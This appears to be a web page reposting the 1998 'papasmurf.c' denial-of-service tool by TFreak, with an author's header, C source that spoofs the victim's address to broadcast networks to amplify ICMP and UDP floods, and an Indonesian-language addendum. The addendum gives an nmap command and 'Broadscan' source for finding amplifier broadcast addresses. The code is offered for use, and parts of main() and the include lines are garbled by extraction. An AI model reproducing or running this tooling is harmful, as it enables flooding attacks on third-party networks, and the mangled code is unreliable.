Virus Smurf.c

/*
* (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
*
* A year ago today I made what remains the questionable decision of
* releasing my program 'smurf', a program which uses broadcast "amplifiers"
* to turn an icmp flood into an icmp holocaust, into the hands of packet
* monkeys, script kiddies and all round clueless idiots alike. Nine months
* following, a second program 'fraggle', smurfs udp cousin, was introducted
* into their Denial of Service orgy. This brings us to today, July 28,
* 1998, one year after my first "mistake". The result, proof that history
* does repeat itself and a hybrid of the original programs.
*
* First may I say that I in no way take credit for "discovering" this.
* There is no doubt in my mind that this idea was invisioned long before
* I was even sperm -- I merely decided to do something about it. Secondly,
* if you want to hold me personally responsible for turning the internet
* into a larger sesspool of crap than it already is, then may I take this
* opportunity to deliver to you a message of the utmost importance -- "Fuck
* you". If I didn't write it, someone else would have.
*
* I must admit that there really is no security value for me releasing this
* new version. In fact, my goals for the version are quite silly. First,
* I didn't like the way my old code looked, it was ugly to look at and it
* did some stupid unoptimized things. Second, it's smurfs one year
* birthday -- Since I highly doubt anyone would have bought it a cake, I
* thought I would do something "special" to commemorate the day.
*
* Hmm, I am starting to see why I am known for my headers (wage eats
* playdough!).
*
* Well, I guess this wouldn't be the same if I did not include some sort
* of shoutouts, so here goes...
*
* A hearty handshake to...
*
* o MSofty, pbug, Kain -- No matter which path each of you decides to
* take in the future, I will always look back upon these days as one
* of the most enjoyable, memorable and thought-provoking experiences
* of my life. I have nothing but the highest degree of respect for
* each of you, and I value your friendship immensely. Here's to
* living, learning and laughing -- Cheers gentlemen. --Dan
* o Hi JoJo!
* o morbid and his grandam barbiegirl gino styles, yo.
* o The old #havok crew.
* o Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek,
* brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige,
* RedFemme,nici,everlast,and everyone else I know and love.
*
* A hearty enema using 15.0mol/L HCl to...
*
* o #Conflict. Perhaps you are just my scapegoat of agression, but you
* all really need to stop flooding efnet servers/taking over irc
* channels/mass owning networks running old qpoppers and get a
* fucking life.
* o BR. It wouldn't be the same without you in here, but to be honest
* you really aren't worth the space in the already way-to-bloated
* header, nor the creative energy of me coming up with an intricate
* bash that you will never understand anyway. Shrug, hatred disguises
* itself as apathy with time.
*
* I feel like I'm writing a fucking essay here...
*
* To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
* or just
* "gcc -o smurf5 papasmurf.c" if your BSDish.
*
* Old linux kernels won't have BSD header support, so this may not compile.
* If you wish a linux-only version, do it yourself, or mail
* tfreak@jaded.net, and I might lend you mine.
*
* And most importantly, please don't abuse this. If you are going to do
* anything with this code, learn from it.
*
* I remain,
*
* TFreak.
*
*/

/* End of Hideously Long Header */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */
#ifndef _USE_BSD
#define _USE_BSD
#endif
#endif
#include
#include
#include

#ifdef LINUX
#define FIX(n) htons(n)
#else
#define FIX(n) (n)
#endif

struct smurf_t
{
struct sockaddr_in sin; /* socket prot structure */
int s; /* socket */
int udp, icmp; /* icmp, udp booleans */
int rnd; /* Random dst port boolean */
int psize; /* packet size */
int num; /* number of packets to send */
int delay; /* delay between (in ms) */
u_short dstport[25+1]; /* dest port array (udp) */
u_short srcport; /* source port (udp) */
char *padding; /* junk data */
};

/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);


int
main (int argc, char *argv[])
{
struct smurf_t sm;
struct stat st;
u_long bcast[1024];
char buf[32];
int c, fd, n, cycle, num = 0, on = 1;
FILE *bcastfile;

/* shameless self promotion banner */
fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");

if (argc < icmp =" 1;" psize =" 64;" num =" 0;" delay =" 10000;" sin_port =" htons(0);" sin_family =" AF_INET;" srcport =" 0;" s_addr =" resolve(argv[1]);" bcastfile =" fopen(argv[2]," optind =" 3;" c =" getopt(argc," rnd =" 1;" rnd =" 1;" srcport =" 0;" num =" atoi(optarg);" delay =" atoi(optarg);" icmp =" 1;" icmp =" 0;" udp =" 1;" icmp =" 1;" udp =" 1;" srcport =" (u_short)" psize =" atoi(optarg);" fd =" open(optarg," padding =" (char" psize =" st.st_size;" padding =" (char" s =" socket(AF_INET," p =" buf," valid =" 1;" valid =" 0;" num ="=" n =" 0," cycle =" 0;" x =" 0;" 50 ="=" cycle =" (cycle" host=""> [options]\n"
"\n"
"Options\n"
"-p: Comma separated list of dest ports (default 7)\n"
"-r: Use random dest ports\n"
"-R: Use random src/dest ports\n"
"-s: Source port (0 for random (default))\n"
"-P: Protocols to use. Either icmp, udp or both\n"
"-S: Packet size in bytes (default 64)\n"
"-f: Filename containg packet data (not needed)\n"
"-n: Num of packets to send (0 is continuous (default))\n"
"-d: Delay inbetween packets (in ms) (default 10000)\n"
"\n", s);
exit(-1);
}


u_long
resolve (char *host)
{
struct in_addr in;
struct hostent *he;

/* try ip first */
if ((in.s_addr = inet_addr(host)) == -1)
{
/* nope, try it as a fqdn */
if ((he = gethostbyname(host)) == NULL)
{
/* can't resolve, bye. */
herror("Resolving victim host");
exit(-1);
}

memcpy( (caddr_t) &in, he->h_addr, he->h_length);
}

return(in.s_addr);
}


void
getports (struct smurf_t *sm, char *p)
{
char tmpbuf[16];
int n, i;

for (n = 0, i = 0; (n < p ="=">dstport[n] = (u_short) atoi(tmpbuf);
n++; i = -1;
continue;
}

tmpbuf[i] = *p;
}
tmpbuf[i] = '\0';
sm->dstport[n] = (u_short) atoi(tmpbuf);
sm->dstport[n + 1] = 0;
}


void
smurficmp (struct smurf_t *sm, u_long dst)
{
struct ip *ip;
struct icmp *icmp;
char *packet;

int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;

packet = malloc(pktsize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));

memset(packet, 0, pktsize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_ICMP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in ICMP header */
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO <<>s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
struct ip *ip;
struct udphdr *udp;
char *packet, *data;

int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;

packet = (char *) malloc(pktsize);
ip = (struct ip *) packet;
udp = (struct udphdr *) (packet + sizeof(struct ip));
data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));

memset(packet, 0, pktsize);
if (*sm->padding)
memcpy((char *)data, sm->padding, sm->psize);

/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;

/* fill in UDP header */
if (sm->srcport) udp->uh_sport = htons(sm->srcport);
else udp->uh_sport = htons(rand());
if (sm->rnd) udp->uh_dport = htons(rand());
else udp->uh_dport = htons(sm->dstport[n]);
udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
// udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));

/* send it on its way */
if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}

free(packet); /* free willy! */
}


u_short
in_chksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}

if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}

sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

/* EOF */


---- selsai -----

berikut ini adalah cara mencari ip broadcast menggunakan tools yang sudah tidak asing lagi
yaitu
NMAP :)

commandnya : nmap -n -sP -PI -o smurf.log 'xxx.12.*.0,63,64,127,128,191,192,255'

catatan : hanya *.255 yang bisa digunakan untuk smurf attack file broadcast tersimpan di
smurf.log terus bisa dipilih dan di bikin file baru buat input di papasmurf.c

ini file broadscan.c bisa juga dipake buat nyari broadcast server

-- tarik maaaanggg ----

/* Broadscan v 0.31
DUP Broadcast IP scanner
by Vacuum http://www.technotronic.com
09-03-98
This is a very lame scanner written to
stop people from asking how to find
DUP broadcast ip addresses. Use this in
conjunction with smurf, fraggle,
or papasmurf. DoS kiddies enjoy!
*/

#include
#include

#define DEBUG 1

FILE *stream;

void pingz0r(int first, int second, int start, int end)
{
int counter,flag;
FILE *stream;
char tempstring[2048];
char parse[2048];

for (counter=start; counter /dev/null",first,
second, counter);
stream=popen(tempstring,"r");
while (fgets(parse,sizeof(parse),stream)!=NULL)
{
if (DEBUG) printf("Results:%s",parse);
if (strstr(parse,"DUP"))
{
flag=1;
fclose(stream);
break;
}
}
if (flag==1)
stream=fopen("broadcast.txt", "a");
fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
fclose( stream);
}
}

main(int argc, char *argv[])

{
int first,second;

if (argc!=3)
{
printf("\nusage : %s \n\n",argv[0]);
exit(0);
}

first=atoi(argv[1]);
second=atoi(argv[2]);

if (first==127)
{
printf("%d is a localhost. You have no clue or are trying to break this program",first);
exit(0);
}
if (first>254 || first <0)>",first);
exit(0);
}
if (second>254 || second<0)>",second);
exit(0);
}

printf("Scanning for DUP broadcast ip addresses\n");
printf("Results output to broadcast.txt\n");

if (fork()!=0)
pingz0r(first,second,0,128);
else
pingz0r(first,second,128,255);

}